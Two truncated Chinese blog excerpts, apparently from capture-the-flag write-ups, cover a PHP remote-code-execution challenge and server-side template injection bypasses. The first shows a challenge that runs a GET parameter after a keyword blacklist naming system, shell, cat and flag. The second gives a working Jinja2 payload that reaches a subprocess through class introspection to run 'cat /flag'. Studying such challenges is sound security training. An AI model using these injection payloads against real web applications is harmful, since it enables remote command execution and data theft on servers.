摘要:
RCE-Web32 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", 阅读全文
摘要:
SSTI各种绕过 SSTI-Web363 过滤单双引号 {{[].__class__.__mro__[-1].__subclasses__()[407](request.args.a,shell=True,stdout=-1).communicate()[0]}}&a=cat /flag SSTI- 阅读全文